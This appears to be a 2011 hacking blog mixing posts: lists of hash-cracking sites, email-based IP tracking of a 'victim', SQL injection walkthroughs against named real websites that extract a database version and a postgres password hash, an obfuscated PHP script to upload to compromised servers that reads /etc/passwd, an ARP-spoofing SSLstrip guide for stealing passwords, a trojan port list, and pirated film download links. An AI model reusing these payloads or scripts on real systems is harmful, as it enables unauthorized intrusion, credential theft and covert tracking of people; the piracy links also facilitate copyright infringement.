Thursday, December 22, 2011

Cracking Hash : List of Web

MD5 Cracker Web List

Just wanna share with you guys. A list of web/services for cracking a md5 hash.
Check it out. r0x d4 n3tw0rk

- md5gle.com

- online md5 cracker,md5 reverse, md5 decrypt (457,354,352,282)

- md5Crack.com | online md5 cracker

- [ md5 crack password crack hash checker ]

- md5cracker.tk (MD5 Search engine by searches a total of 14 on-line crackers.)

- Index of / (5,889,729)

- AP3 Designs

- http://md5-db.com (The database is approximately 70gb)

- md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com (56,502,235)

- GData: An Online MD5 Hash Database (3,251,106)

- TMTO[dot]ORG (306.000.000.000)

- milw0rm.com - free md5/lm hash cracking (Milw0rm Cracker db)

- BlackLight's hash cracker (2,456,288)

- .:Shell-Storm.org:. | DataBase MD5 | ( The data base currently contains 169582 passwords )

- Parallels Confixx (Need Account)

- Passwords recovery - MD5, SHA1, MySQL (Register to increase your priority)

- md5ÔÚÏß²éѯÆƽâ|md5½âÃÜ|md5¼ÓÃÜ|salt

- Hashkiller.com

- plain-text.info

- insidepro.com

- md5decrypter.co.uk

- c0llision.net

- md5pass.info

- hashcrack.com

- generuj.pl

- authsecu.com

- md5decryption.com

- chwett.com/md5

- md5this.com

- tmto.org

- kerinci.net

- hash.db.hk

- crackfor.me

- md5hood.com

- neofusion.de

- md5.shalla.de

- md5.my-addr.com

- hashcracking.info <-- API: https://hashcracking.info/check.php?hash= {hash}

- md5.opencracking.info

- md5online.net

- macrosoftware.ro/md5

- netmd5crack.com

- bokehman.com

- hash-database.net

- thoran.eu

- md5-database.net

- web-security-services.com

- bitdelivery.net



-----------------------------------------------------------------
CRACKED PASSWORD LIST
-----------------------------------------------------------------
www.md5oogle.com
[ md5 crack password crack hash checker ]
milw0rm.com - free md5/lm hash cracking
darkc0de.com [ index ]

-----------------------------------------------------------------
MULTI
-----------------------------------------------------------------
md5cracker.org
md5.igrkio.info
hashkiller.com
hashchecker.de
sinhalayo159.07x.net


-----------------------------------------------------------------
IRC
-----------------------------------------------------------------
plain-text.info (irc.Plain-Text.info #rainbowcrack |||| irc.rizon.net #rainbowcrack)
md5.overclock.ch (irc.rizon.net #md5)
c0llision.net (irc.after-all.org #md5crack |||| ircd.hopto.org #md5crack)



-----------------------------------------------------------------
ICQ
-----------------------------------------------------------------
c0llision.net (427-921-047) <- md5, ntlm
hashkiller.com (405-701-776) <- md5



-----------------------------------------------------------------
LM
-----------------------------------------------------------------
lmcrack.com
plain-text.info


-----------------------------------------------------------------
NTLM
-----------------------------------------------------------------
plain-text.info
md5decrypter.co.uk


-----------------------------------------------------------------
SHA1
-----------------------------------------------------------------
md5.rednoize.com
hash.db.hk
md5decrypter.co.uk


-----------------------------------------------------------------
SHA256
-----------------------------------------------------------------
md5.shalla.de
hash.db.hk


-----------------------------------------------------------------
RAINBOW TABLE
-----------------------------------------------------------------
Free Rainbow Tables » Distributed Rainbow Cracking » LM, NTLM, MD5, SHA1, HALFLMCHALL, MSCACHE
Rainbow Tables . net


Sunday, November 27, 2011

Track IP using email

Track IP using email

Track IP using email - article asal dari Iniseni
This time i will explained how to track IP address with advanced method. By using method you can get the IP address,location, timing of victim.


How to track IP address?
step 1:
know what is your victim email id.
For eg:
victimid[@]gmail.com

step 2:
Register an account here: http://www.readnotify.com


step 3:
send mail to victim using your readnotify.com mail account. Before sending mail append ".readnotify.com" at end of victim mail ID.
For eg:
victimid[@]gmail.com.readnotify.com


step 4:
if victim opens the mail, his info will be tracked(IP address) and mailed to your account.

Now u get the IP..he just got pwned by you!!iniseni


Tuesday, November 22, 2011

#./ro0t3r.sh: SQLi Filter bypass WAF

#./ro0t3r.sh: SQLi Filter bypass WAF: This is SQLi evasion filter.. that used to bypass WAF (Web Application Firewall) filter for some string,char,byte,operator and others... ...


Wednesday, November 16, 2011

#./ro0t3r.sh: Hash Type

#./ro0t3r.sh: Hash Type: For you guys as refferer Sharing is caring.. kekeke ES(Unix) IvS7aeT4NzQPM Domain Cached Credentials Admin:b474d48cdfc4974d86e f4d249...

For more visi t#./ro0t3r.sh


Monday, May 30, 2011

Oracle Database Injection


So we gonna play with Oracle Database Injection
our target :
http://www3.inn.cl
First using Union Based injection

1 - Kita mulakan check vuln dgn letak single quote '
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
jika ade vuln,ia akan keluarkan error :
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
Kita dapat lihat ORA-01756,dan dgn segera tahulah ini oracle injection kn?


2 - Kita cari bilangan column mcm biasa. order by 1-- sampai error
dan dari web ni,column yg ade = 9
3 - so kita teruskan dgn union injection kita
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
jika di sini tiada nombor column yg error  kluar..So kita lihat error dia.
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6

FROM keyword not found,bermaksud injection ni kita perlukan FROM. 
Utk rujukan :
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/

Sebelum tu,kita perlukan null kan dulu semua nombor column sama mcm dlm posgresql injection.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null--

Dan utk mudahkan kita nk tau column mane bleh diinjek,tukarkan null kepada 0 satu demi satu.
dalam kes ni,column null pertama lepas letak 0 takde error,tp error wujud kalau pada column ke 2.
ini bermaksud,column kedua tu kita leh inject


4 - dlm tutorial nih kita just inject and extrac sampai version() je yer,yg lain2 korang test sdri GayFace
dari pentestmonkey,kita tgk ade 3 syntax utk cek version
Quote:SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;


so kita just amik yg 1st sbg testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:Oracle Database 10g Release 10.2.0.1.0 - 64bit Production
Image has been scaled down 22% (800x429). Click this bar to view original image (1022x547). Click image to open in new window.




So..dah berjaya... Smile
----------------------------------------------------------------------------------------------------------
 Kalau Error Base..kita biasa guna or 1=1 /or 1=2
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
function utl_inaddr.get_host_address hanya boleh digunakan kalau
oracle itu adalah version 10g ke bawah..kalau yg 11g kita perlu gunakan

Code:
1=ctxsys.drithsx.sn(1,(sql syntax))


Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6
[Image: 41004395321842115849.png]


Credit to : p0pc0rn @tbd.my 


Error Based PosgreSQL Injection

This is a demo on how to attack a website with error based Posgresql Injection. I take from my 0day web apps that just published as an example.


our victim is
http://www.creatop.com.cn
try to put ' at the url.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'
The output
Code:
ERROR: syntax error at or near "''"

When I try to use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1
it will return TRUE page. while when i'm using
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0
FALSE page replied.

So, I know this is either blind sql or error based sql.
I try using error based method.

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)
Owh Lucky!! it works! Posgresql!

So proceed to get the table name.
Same like we injecting other vulnerable website,posgresql is quite similar.In Posgresql error based,all sql query must be in this form
Code:
cast((your sql command/query) as int)
So, to get the table name we use cast((select table_name from information_schema.tables limit 1 offset 0) as int) what do we get??
Code:
ERROR: invalid input syntax for integer: "pg_type"
one of the table_name is pg_type"
We try to check other table_name by increasing the offset number.
So I know there is pg_user and pg_shadow table. I try to get the data from pg_shadow
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "postgres"
the usename is postgres
How about the passwd??
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "md5caa5a31e69edef35ea15e2db062836a7"

there you are..we already get the passwd hash!
Then u can proceed what ever u want.
I will stop at here.Else you need to explore it yourself.

References
Code:
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://pentestmonkey.net/blog/postgres-sql-injection-cheat-sheet/

credit to : p0pc0rn 


Monday, February 28, 2011

[Movie] HAQ 2011 - 220MB rmvb


PLOT MOVIE:
“Haq” is an action film concerning the struggle between good and evil. Haq (Zul Huzaimy) and Bad (Adi Putra) are gifted with special powers. Bad, who was adopted by Haq’s family, has a deep-seated hatred for Haq. He uses his powers to tarnish Haq’s good name. However, Haq refrains from using his powers to stop Bad until he finds himself cornered by the latter.


 File type : RMVB
Download :
  Part 1

 Part 2



[Movie] KURAFAT (2011) DVDRip AVI(700MB)/MKV(200MB)-wancuiX

Plot : http://www.imdb.com/title/tt1801064/
Release Date: 13 January 2011 (Malaysia) 
Country: Malaysia | Subtitle: None 
Size: MKV = 180MB
File type : MKV
Download :


[Movie] Hantu kak limah balik rumah (2010) PPVrip 800MB - SmartiesRelease

Plot : Kesinambungan dari zombi kampung pisang.. Kak Limah yang disangka hantu sbenarnya manusia..dia seorang yang kurang siuman. Banyak kisah lucu citer ni.. "cu citer..cu citer.. zombi zombi..Zomba!!
"Husin yang bekerja di Singapura telah bercadang untuk pulang ke kampung halamanya, Kampung Pisang. Setelah kepulangannya, dia merasakan jirannya, Mak Limah berkelakuanb pelik kerana tidak bercakap dan tidak tidur. Sewaktu minum di warung Pak Munawar, Husin menceritakan berkemungkinan bahawa Mak Limah adalah hantu. Pak Abu membuat cadangan untuk menyiasat dengan lebih lanjut dan mereka tealh pergi ke rumah Mak Limah dan mereka terperanjat kerana melihat mayat Mak Limah dan menjadi busuk. Walaubagaimanapun, setelah Mak Limah dikebumikan, orang kampung masih lagi mengalami kejadian-kejadian aneh" ...


 


Thursday, January 27, 2011

OS : Blackbuntu


Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security.

Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10 and work on reference Back|Track. It's created as a hobby.

Jagan nakal-nakal.. ;D


Jumping Server


Jumping Server..just copy n paste it to notepad..Save it as *.php
Then upload to the target box.. (mcm upload shell la).. Then don't nakal2.. ;D
------------------code------------------
<? 

 $x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72"; 
($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "<font \146\x61\x63\145\075V\145rd\x61\x6ea s\x69\172\x65=\x32 \x63\x6fl\x6f\162\075Ma\162\x6fo\x6e\x3eC\x72\x65at\145d \x42\x79\040\x58\141\144\160\x72ito\170 \x2c \0620\061\x30,\040\124\141\156\x67\145r\x61\x6e\147 <\057\x66\157\156\x74\076\074b\x72\040\x2f>";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "<f\x6fnt\x20\146\x61\143\x65\x3d\126\x65\162\144a\156a \163iz\145=2\x20c\x6f\154\157\162\075\x4d\x61ro\157n\076 \x4f\x6b\054\x20L\x65\x74'\x73 B\x65g\x69n \x2e\x2e\056\x20\x3c/\x66\x6f\x6et><b\x72\x20\x2f\076";echo "\x3c\x66\x6fnt\x20f\141\143\145=\126er\144a\x6ea\x20\x73i\x7ae=\062 c\x6f\x6c\x6fr=\x54\x65al>\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a*\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\x2a\052</font\076<b\x72\x20\057\x3e";echo "\x3cb\162 /\076";echo "<\146\157\x6et\x20\x66\x61\x63\x65\x3dV\x65\162\x64a\x6e\x61 \163\151\x7a\145=\062\040c\157l\157\x72=M\141\x72\157\x6f\156\076\x54\x68an\x6bs \106\x6fr \125\x73\x69n\x67 \x54\150\x69s S\151m\160\x6c\x65\x20\124\x6f\x6f\x6c\x73.\040 \x5e_\x5e\074\057\146\157\x6et\x3e\074b\162 \x2f\076";echo "\074f\157\156t\x20\x66\141ce=V\x65rd\x61\156a\040\163\x69\172\145\x3d\062\076<\057\x66ont\x3e";echo "<f\157n\164\040f\x61\143\145\x3d\126e\162dana\040\163iz\145=\x32\x3e\074/\146\157\156t>";

?>


Monday, January 17, 2011

Installation Guide : ionCube loader

A guide to installing and configuring the ionCube loader to view encoded web pages for scripts such as ClientExec.What is ionCube ?
ionCube produces leading tools for PHP source code protection to secure your PHP software from prying eyes and to combat software piracy. Featuring an advanced compiled-code encoding engine that translates source to highly efficient bytecodes, ionCube encoding tools deliver the ideal combination of maximum source code protection without sacrificing performance, reliability or language compatibility.

In order to view encoded ionCube files on your server you need the ionCube loader. This is a free plugin for Apache web server that only takes a few minutes to install and is well worth it.
http://www.ioncube.com/
Requirements: - Root Shell access to your server
- phpinfo page: create a new document and call it phpinfo.php. Inside place <? phpinfo(); ?>
  Place this document in your www directory so you can view it and see all your PHP settings.
Installing ionCube Loader:
1. Download the program and store it on your server using wget or FTP.
http://www.ioncube.com/loader_download.php
2. Unpack the program
tar -zxvf ioncube_loaders.tar.gz
3. cd ioncube
4. copy ioncube-install-assistant.php to a web directory such as your hosting directory and open it in your browser window.
cp ioncube-install-assistant.php /home/userdirectoryhere/www
Then open it http://www.yourdomain.com/ioncube-install-assistant.php
The output should be something similar to:
Analysis of your system configuration shows:
PHP Version 4.3.3
Operating System Linux
Threaded PHP No
php.ini file /usr/local/lib/php.ini
Required Loader ioncube_loader_lin_4.3.so
5. Now lets move the iconcube directory to a permanent location:
cd ..
mv ioncube /usr/local

6. Now that you know the location of php.ini you need to edit it.
pico /usr/local/lib/php.ini
Now find where other zend extentions are in the file.
ctrl + w: zend_extension
Paste in your new line for ioncube loader
zend_extension = /usr/local/ioncube/ioncube_loader_lin_4.3.so
7. Save the changes
ctrl + X then Y and enter
8. Restart the web server to take effect.
/etc/init.d/httpd restart
Success! You should now see a section in your PHP Info page that says:
Additional Modules
Module Name ionCube Loader


Sunday, January 16, 2011

SSLstrip Tutorial


SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We setup 2 vmware machines, one running Widnows XP (victim) and the other Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:

1. Setting up IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

3. Setting up port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

python sslstrip.py -w secret

Once this setup is up and running perfectly, all of our victim's traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim's passwords sent supposedly over "SSL".
Download SSLstrip Tool : Here - SSLstrip Tool


Thursday, January 13, 2011

[Movie]Ngangkung (2010) Eng Sub DVDRip RMVB-KURYU 223MB

PLOT MOVIE:
 
"Ngangkung" tells the story of a lorry driver Azim who lives a moderate lifestyle with his wife Suri and his daughter. Tasnim and Wan are Azim's closest friends and they start influencing Azim to bet on the lottery. Things take a turn when the number acquired by Tasnim by the way of 'ngangkung' is successful and it changes things completely as Azim starts to enjoy indulging in the activity


File format : AVI
Download:
 
fileserve - Ngangkung part 1
fileserve - Ngangkung part 2
 
-------------------------------
Mediafire :
http://adf.ly/FiTx
http://adf.ly/FiTw
http://adf.ly/FiTv
http://adf.ly/FiTu
 


[Movie ] Aku Masih Dara AVI [DVDRIP/MF] | 700MB

Sinopsis:


Sofea (Raja Farah) , Hani (Diana Amir) dan Aleesya (Yana) merupakan kawan baik walaupun berlainan latarbelakang. Masing masing mempunyai pandangan yang berbeza tentang islam. Setiap malam mereka akan ke disko dan melakukan maksiat. Sofea berbeza , beliau hanya menyimpan "mahkotanya" untuk seorang lelaki yang akan membimbingnya ke jalan allah. Kemunculan Daus (Ashraf Muslim) mengubah persepsi Sofea terhadap islam. Sofea ingin berubah, malangnya ditentang oleh dua rakan karibnya. Saksikan Aku Masih Dara untuk mengetahui kesudahan filem yang menginsafkan ini..
 
File format : AVI
Download:


fileserve -Aku Masih dara part 1
fileserve -Aku Masih dara part 2

-----------------------------------------
mediafire - Aku masih Dara part 1
mediafire - Aku masih Dara part 2
mediafire - Aku masih Dara part 3
mediafire - Aku masih Dara part 4
 


Monday, January 3, 2011

Trojan ports

 This is trojan port through TCP and UDP.. So beware

TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250
TCP 28 Amanda.200
TCP 31 MastersParadise.920
TCP 68 Subseven.100
TCP 142 NetTaxi.180
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 171 ATrojan.200
TCP 285 WCTrojan.100
TCP 286 WCTrojan.100
TCP 334 Backage.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 413 Coma.109
TCP 420 Breach.450
TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100
TCP 623 Rtb666.160
TCP 660 Zaratustra.100
TCP 661 Noknok.800, Noknok.820
TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110
TCP 667 SniperNet.210, Snipernet.220
TCP 668 Unicorn.101, Unicorn.110
TCP 680 Rtb666.160
TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332
TCP 785 NetworkTerrorist.100
TCP 800 NeuroticKitten.010
TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130
TCP 901 NetDevil.130, NetDevil.140
TCP 1000 DerSpaeher.200
TCP 1001 Silencer.100
TCP 1008 AutoSpy.100
TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1999 TransmissionScout.100, TransmissionScout.110
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 2001 DIRT.220, TrojanCow.100
TCP 2003 TransmissionScout.100, TransmissionScout.110
TCP 2023 RipperPro.100
TCP 2040 InfernoUploader.100
TCP 2115 Bugs.100
TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
TCP 2332 SilentSpy.202
TCP 2589 Dagger.140
TCP 2600 DigitalRootbeer.100
TCP 2989 Rat.200
TCP 3128 MastersParadise.970
TCP 3129 MastersParadise.920, MastersParadise.970
TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
TCP 3215 BlackStar.100, Ghost.230
TCP 3333 Daodan.123
TCP 3410 OptixPro.100, OptixPro.110
TCP 3456 Force.155, TerrorTrojan.100
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 3586 Snid.120, Snid.212
TCP 3700 PortalOfDoom.100
TCP 3723 Mantis.100
TCP 3800 Eclypse.100
TCP 3996 RemoteAnything.364
TCP 4000 SkyDance.220, SkyDance.229
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 4225 SilentSpy.202
TCP 4321 Bobo.100
TCP 4444 AlexTrojan.200, Crackdown.100
TCP 4488 EventHorizon.100
TCP 4523 Celine.100
TCP 4545 InternalRevise.100, RemoteRevise.150
TCP 4567 FileNail.100
TCP 4666 Mneah.100
TCP 4950 ICQTrojan.100
TCP 5005 Aladino.060
TCP 5025 Keylogger.WMRemote.100
TCP 5031 NetMetro.104
TCP 5032 NetMetro.104
TCP 5033 NetMetro.104
TCP 5050 RoxRat.100
TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040
TCP 5190 MBomber.100
TCP 5277 WinShell.400
TCP 5343 WCRat.100
TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300
TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5534 TheFlu.100
TCP 5550 XTCP.200, XTCP.201
TCP 5555 Noxcape.100, Noxcape.200
TCP 5695 Assassin.100
TCP 5714 WinCrash.100
TCP 5741 WinCrash.100
TCP 5742 WinCrash.103
TCP 5802 Y3KRat.160
TCP 5810 Y3KRat.160
TCP 5838 Y3KRat.170
TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5880 Y3KRat.140
TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5883 Y3KRat.110, Y3KRat.140
TCP 5884 Y3KRat.140, Y3KRat.150
TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5886 Y3KRat.120, Y3KRat.140
TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5890 Y3KRat.140
TCP 6400 Thething.100, Thething.150
TCP 6556 AutoSpy.120, AutoSpy.122
TCP 6655 Aqua.020
TCP 6660 LameSpy.095
TCP 6666 LameRemote.100, ProjectMayhem.100
TCP 6669 Vampire.100
TCP 6670 DeepThroat.200, DeepThroat.210
TCP 6671 DeepThroat.310
TCP 6699 HostControl.101
TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190
TCP 6712 Subseven.100
TCP 6713 Subseven.100
TCP 6767 NTRC.120
TCP 6776 SubSeven.180, SubSeven.190, Subseven.200
TCP 6789 Doly.200
TCP 6796 SubSeven.214
TCP 6912 ShitHeep.100
TCP 6939 Indoctrination.100
TCP 6953 Lithium.100
TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120
TCP 6970 Danton.330
TCP 7001 Freak88.100
TCP 7119 Massaker.100
TCP 7200 Massaker.110
TCP 7300 Coced.221
TCP 7301 Coced.221
TCP 7306 NetSpy.200, NetSpy.200
TCP 7410 Phoenix.190, Phoenix.200
TCP 7511 Genue.100
TCP 7609 Snid.120, Snid.212
TCP 7614 Wollf.130
TCP 7648 BlackStar.100, Ghost.230
TCP 7788 Last.2000, Matrix.200
TCP 7826 MiniOblivion.010, Oblivion.010
TCP 7887 SmallFun.110
TCP 7891 Revenger.100
TCP 7979 VagrNocker.200
TCP 7997 VagrNocker.200
TCP 8000 XConsole.100
TCP 8011 Way.240
TCP 8012 Ptakks.215, Ptakks.217
TCP 8110 LoseLove.100
TCP 8111 LoseLove.100
TCP 8301 LoseLove.100
TCP 8302 LoseLove.100
TCP 8372 NetBoy.100
TCP 8720 Connection.130
TCP 8734 AutoSpy.110
TCP 8811 Force.155
TCP 8899 Last.2000
TCP 9000 Aristotles.100
TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170
TCP 9401 InCommand.100, InCommand.110, InCommand.170
TCP 9402 InCommand.100, InCommand.110
TCP 9561 CRatPro.110
TCP 9563 CRatPro.110
TCP 9580 TheefLE.100
TCP 9696 Danton.210, Ghost.230
TCP 9697 Danton.320, Danton.330, Ghost.230
TCP 9870 R3C.100
TCP 9872 PortalOfDoom.100
TCP 9873 PortalOfDoom.100
TCP 9874 PortalOfDoom.100
TCP 9875 PortalOfDoom.100
TCP 9876 Rux.100, SheepGoat.100
TCP 9877 SmallBigBrother.020
TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120
TCP 9879 SmallBigBrother.020
TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300
TCP 10001 DTr.130, DTr.140
TCP 10013 Amanda.200
TCP 10067 PortalOfDoom.100
TCP 10100 Gift.240
TCP 10101 NewSilencer.100
TCP 10167 PortalOfDoom.100
TCP 10528 HostControl.100, HostControl.260
TCP 10607 Coma.109
TCP 10666 Ambush.100
TCP 11011 Amanda.200
TCP 11050 HostControl.101
TCP 11051 HostControl.100, HostControl.260
TCP 11223 AntiNuke.100, Progenic.100, Progenic.110
TCP 11225 Cyn.100, Cyn.103, Cyn.120
TCP 11306 Noknok.800, Noknok.820
TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 11991 PitfallSurprise.100
TCP 12043 Frenzy.2000
TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
TCP 12346 Netbus.160, Netbus.170
TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317
TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401, Bionet.402
TCP 12389 KheSanh.210
TCP 12478 Bionet.210
TCP 12623 Buttman.090, Buttman.100
TCP 12624 Buttman.090, Buttman.100
TCP 12625 Buttman.100
TCP 12904 Akropolis.100, Rocks.100
TCP 13473 Chupacabra.100
TCP 13753 AFTP.010
TCP 14100 Eurosol.100
TCP 14194 CyberSpy.840
TCP 14286 HellDriver.100
TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14501 PCInvader.060, PCInvader.070
